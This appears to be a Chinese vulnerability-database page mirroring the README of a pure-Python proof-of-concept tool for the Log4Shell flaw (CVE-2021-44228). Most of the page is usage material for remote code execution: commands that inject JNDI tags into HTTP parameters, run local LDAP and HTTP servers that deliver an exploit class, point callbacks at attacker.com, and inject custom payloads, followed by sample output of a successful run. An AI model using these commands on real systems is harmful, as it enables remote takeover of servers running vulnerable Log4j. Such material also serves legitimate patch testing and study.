漏洞平台

POC详情： 54df8018fe97230bed42fa7066c778d8b1512620

来源

https://github.com/alexandre-lavoie/python-log4rce

关联漏洞

标题： Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述：Apache Log4j是美国阿帕奇（Apache）基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞，攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器，当该请求被打印成日志时就会触发远程代码执行。

描述

An All-In-One Pure Python PoC for CVE-2021-44228

介绍

# Python Log4RCE

An all-in-one pure Python3 PoC for [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228).

## Sample

```bash
> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
```

```
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!
```

## Usage

This is a CLI tool. All options can be found in the help menu:

```bash
python3 log4rce.py --help
```

The list is pretty extensive, therefore the following will give you a summary of the functionality.

### Attack Modes

The tool allows you to use a few attack modes. These attacks are extensions of the `Log4RCE` class.

#### HTTP

You can perform an automated HTTP request attack on a target URL.

You can perform a GET request as follows:

```bash
python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"
```

You can perform a POST request as follows:

```bash
python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"
```

The previous will inject the JNDI tag into `###`.

#### Manual

If you cannot use any of the previous, use this mode to dump the JDNI tag:

```bash
python3 log4rce.py manual
```

### Network Settings

The tool allows extensive customization for most network configuration. All the internal servers can be modified to point to different locations according the the remote settings.

#### HTTP Server

You can configure the HTTP server using the following parameters:

```bash
python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
```

```
http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses. 
```

#### LDAP Server

You can configure the LDAP server using the following parameters:

```bash
python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
```

```
ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses. 
```

### Customization

The tool allows can handle some customization. The following lists some functionality you may be interested in.

### Injecting Payload

You can inject a payload into the Java class using:

```bash
python3 log4rce.py --payload "PAYLOAD"
```

The payload will be injected into `"###"` strings.

### Custom Java Payload

You can build your own Java class using the following. 

```bash
javac -source 1.7 -target 1.7 /path/to/Exploit.java
```

The resulting `.class` can be run using:

```bash
python3 log4rce.py --java_class "/path/to/Exploit.class" ...
```

Note: You can add a string `"###"` to allow payload injection.

文件快照


 [4.0K]  /data/pocs/54df8018fe97230bed42fa7066c778d8b1512620
├── [4.0K]  java
│   ├── [ 139]  Exploit.java
│   └── [ 173]  LinuxExploit.java
├── [1.0K]  LICENSE
├── [ 14K]  log4rce.py
└── [3.0K]  README.md

1 directory, 5 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。